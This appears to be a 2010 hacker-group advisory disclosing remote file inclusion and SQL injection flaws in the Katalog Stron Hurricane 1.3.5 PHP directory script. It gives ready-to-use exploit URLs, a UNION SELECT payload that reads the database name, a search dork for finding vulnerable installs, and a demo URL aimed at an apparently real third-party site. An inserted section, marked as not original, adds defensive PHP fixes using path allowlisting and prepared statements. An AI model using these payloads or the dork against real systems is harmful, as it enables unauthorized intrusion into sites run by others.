#############################################################################################################
## Katalog Stron Hurricane Multiple Vulnerabilities RFI / SQL ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : 14 February, 2010 ##
#############################################################################################################
[ Software Information ]
[+] Vendor : http://www.katalog.hurricane.pl/
[+] Download : http://www.katalog.hurricane.pl/download.html
[+] Version : 1.3.5 (lower versions may also be affected)
[+] Vulnerability : RFI
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################
[ Here We go .. Live From Jogja City.. ]
[ RFI ]
http://127.0.0.1/[kaMtiEz]/includes/moderation.php?includes_directory=[INDONESIANCODER]
[ BUG ]
[!] moderation.php
include($includes_directory.'population.php');
[ SQL ]
http://127.0.0.1/[kaMtiEz]/index.php?inc=category&get=[INDONESIANCODER]
[ XPL ]
6666+union+all+select+1,database(),3--
[ DEMO ]
http://server/includes/moderation.php?includes_directory=[EVILc0de]
http://www.bazastron.com.pl/index.php?inc=category&get=6666+union+all+select+1,database(),3--
[ FIX ]
dunno :">
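One way to close both issues, as an added example that is not part of the original advisory and not the vendor's code. The function names and the categories table are hypothetical; only moderation.php, population.php, $includes_directory and the inc/get parameters come from the advisory.

```php
<?php
// Added example, not the vendor's code. Table/column names and function
// names are hypothetical; moderation.php, population.php, $includes_directory
// and the inc/get parameters come from the advisory.

// --- RFI: includes/moderation.php ---
// Vulnerable: include($includes_directory.'population.php');
// The variable is request-settable when request variables are registered
// as globals. Build the path from this file's own directory instead.
function includes_path(string $file): string
{
    if (!preg_match('/\A[a-z_]+\.php\z/', $file)) {   // bare file names only
        throw new InvalidArgumentException('bad include name');
    }
    return __DIR__ . DIRECTORY_SEPARATOR . $file;      // base never comes from the request
}
// In moderation.php: include includes_path('population.php');

// --- SQL: index.php?inc=category&get=... ---
// Treat "get" as a positive integer id and bind it; never concatenate it.
function category_id(array $query): ?int
{
    $id = filter_var($query['get'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function fetch_category(PDO $db, array $query): ?array
{
    $id = category_id($query);
    if ($id === null) {
        return null;                                   // reject before any query runs
    }
    $st = $db->prepare('SELECT id, name FROM categories WHERE id = ?');
    $st->execute([$id]);
    return $st->fetch(PDO::FETCH_ASSOC) ?: null;
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT)");
$db->exec("INSERT INTO categories VALUES (1, 'demo')");

var_dump(fetch_category($db, ['get' => '1']));   // well-formed id
var_dump(fetch_category($db, ['get' => '6666 union all select 1,database(),3--'])); // [ XPL ] input
```

Independently of the code change, keeping register_globals and allow_url_include off in php.ini removes the conditions the include bug depends on.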
#############################################################################################################
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,Ibl13Z,Milo
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
[ NOTE ]
[+] Ibl13Z : Condolences about your flash drive, bro
[+] Milo : Calling MyQueen nonstop, haha
[+] r3m1ck : KAYAK KUWEK Ojo Homok Yak .. ndak baik
[+] gonzhack : I'm praying for you bro, hope you two get back together .. haha ..
[+] for some one .. one day .. u will be mind .. >.<
[ QUOTE ]
[+] we are NOT DEAD INDONESIANCODER STILL r0x
[+] nothing secure ..